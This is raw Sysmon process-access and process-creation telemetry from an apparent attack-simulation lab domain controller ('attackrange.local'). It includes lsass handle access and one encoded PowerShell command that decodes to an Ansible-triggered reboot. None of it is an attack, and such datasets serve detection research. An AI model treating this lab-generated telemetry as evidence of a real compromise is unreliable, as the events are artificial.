13:08:49.637{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.637{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-4261-6000-E202-000000009901}27884380C:\Windows\system32\conhost.exe{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-4261-6000-E502-000000009901}40481584C:\Windows\system32\cmd.exe{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.614{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4260-6000-168F-110000000000}0x118f160HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4261-6000-E502-000000009901}4048C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-4261-6000-E202-000000009901}27884380C:\Windows\system32\conhost.exe{08A6967A-4261-6000-E502-000000009901}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 